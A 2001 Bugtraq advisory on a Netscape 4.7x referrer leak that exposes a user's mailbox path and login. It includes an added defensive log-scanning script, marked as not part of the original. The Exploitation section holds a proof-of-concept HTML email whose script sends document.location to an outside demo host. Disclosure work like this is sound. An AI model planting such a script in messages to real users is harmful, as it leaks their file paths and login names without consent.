From: 3APA3A (3APA3ASECURITY.NNOV.RU)
Date: Tue Jun 05 2001 - 07:01:19 CDT


    Hello bugtraq,

    There are known bugs in Netscape which require knowledge of the location
    of the user's files. This bug is not a serious one, but it allows an
    attacker to obtain that location.

    Topic : Netscape 4.7x user information retrieval
    Author : 3APA3A <3APA3Asecurity.nnov.ru>
    Affected software : Netscape 4.7x All Platforms
    Vendor : Netscape (IPlanet)
    Risk : Low
    Remotely Exploitable : Yes
    Released : 30 May 2001
    Vendor URL : http://www.netscape.com
    SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories

    Background:

    Netscape Messenger uses an internal protocol called mailbox://. The
    format of a mailbox URI is

    mailbox://full_path_to_user_folder?ID=some_message_id&number=somenumber

    This URI contains the full path to the user's mailbox, which usually
    contains the user's login name and, in the case of Windows 9x, the path
    to the Netscape installation. It is impossible to determine this
    location from JavaScript inside an e-mail message, because Netscape
    hides document.location from JavaScript.

    Problem:

    It is possible to retrieve the mailbox:// URI of the message, i.e. the
    mailbox location, the user's system login and, in some cases, the path
    to the Netscape installation.

    Details:

    When a link is invoked from a message, Netscape sets the
    "document.referrer" property to the URI of the message containing this
    link. JavaScript on the target page is able to retrieve this property
    and pass it to any location, together with the IP of the calling
    machine.
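    The following is an added example, not part of the original advisory or
    of any Netscape or SECURITY.NNOV code. It shows, from the defender's side,
    what a mailbox:// Referer actually discloses: it parses the URI format
    given in the Background section, extracts the folder path and the login
    name it usually embeds, and scans web-server log lines for requests whose
    Referer carries such a URI. The log lines, hostnames, client addresses and
    mailbox paths are constructed for the example; the function names and the
    /home/<user> and Users/<user> path conventions are assumptions.

```javascript
// Added example (not from the advisory): inspect mailbox:// Referer values.
// URI format assumed from the advisory:
//   mailbox://full_path_to_user_folder?ID=some_message_id&number=somenumber

// Parse a mailbox:// URI into its folder path and query parameters.
// Returns null when the string is not a mailbox:// URI.
function parseMailboxUri(uri) {
  const m = /^mailbox:\/\/([^?]*)(?:\?(.*))?$/i.exec(uri);
  if (!m) return null;
  const folderPath = decodeURIComponent(m[1]);
  const params = {};
  for (const pair of (m[2] || '').split('&')) {
    if (!pair) continue;
    const [k, v = ''] = pair.split('=');
    params[decodeURIComponent(k)] = decodeURIComponent(v);
  }
  return { folderPath, params };
}

// Split a folder path on either separator and drop empty components.
function pathComponents(folderPath) {
  return folderPath.split(/[\\/]+/).filter(Boolean);
}

// Return the login name the path exposes, assuming the common layouts
// /home/<user>/... (Unix) and .../Users/<user>/... (Windows profiles).
// Returns null when neither pattern is present.
function exposedLogin(folderPath) {
  const parts = pathComponents(folderPath);
  for (let i = 0; i < parts.length - 1; i++) {
    if (/^(home|users)$/i.test(parts[i])) return parts[i + 1];
  }
  return null;
}

// Constructed log lines: client, timestamp, request, status, Referer.
const SAMPLE_LOG = [
  '10.0.0.5 - - [05/Jun/2001:07:01:19] "GET /files/nsdemo.asp HTTP/1.0" 200 "mailbox:///home/alice/nsmail/Inbox?ID=12345&number=7"',
  '10.0.0.6 - - [05/Jun/2001:07:02:00] "GET /index.html HTTP/1.0" 200 "http://www.example.com/"',
  '10.0.0.7 - - [05/Jun/2001:07:03:41] "GET /files/nsdemo.asp HTTP/1.0" 200 "mailbox://C|/Program%20Files/Netscape/Users/bob/mail/Inbox?ID=1&number=2"',
];

// Scan log lines and report each request whose Referer is a mailbox:// URI,
// together with what that Referer discloses about the client.
function findLeakingReferers(lines) {
  const hits = [];
  for (const line of lines) {
    const refMatch = /"([^"]*)"\s*$/.exec(line); // last quoted field = Referer
    if (!refMatch) continue;
    const parsed = parseMailboxUri(refMatch[1]);
    if (!parsed) continue;
    hits.push({
      client: line.split(' ')[0],
      folderPath: parsed.folderPath,
      login: exposedLogin(parsed.folderPath),
      messageId: parsed.params.ID,
    });
  }
  return hits;
}

console.log(findLeakingReferers(SAMPLE_LOG));
```

    Run against a real access log, the same scan tells an administrator which
    clients are sending mail-reader internal URIs as Referer and therefore
    which accounts have had their mailbox path and login name exposed.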

    Exploitation:

    If you read this message with Netscape Messenger you can simply follow
    the link http://www.security.nnov.ru/files/nsdemo.asp to see your
    mailbox location, or you can force a Netscape user to open this page
    with a message like this:

    -=-=-=-=-=-=-=-=-=-
    From: 3APA3A
    To: 3APA3A
    Subject: Test your Netscape
    Content-Type: text/html

    <html><script>
     window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location));
    </script>
    <A
     HREF="http://www.security.nnov.ru/files/nsdemo.asp"
    >
     http://www.security.nnov.ru/files/nsdemo.asp
    </A>
    </html>
    -=-=-=-=-=-=-=-=-=-

    Vendor:

    Netscape was contacted May 30, 2001 via
     http://help.netscape.com/forms/bug-security.html
    No feedback was given.

    -- 
    http://www.security.nnov.ru
             /\_/\
            { . . }     |\
    +--oQQo->{ ^ }<-----+ \
    |  3APA3A  U  3APA3A   }
    +-------------o66o--+ /
                        |/
    You know my name - look up my number (The Beatles)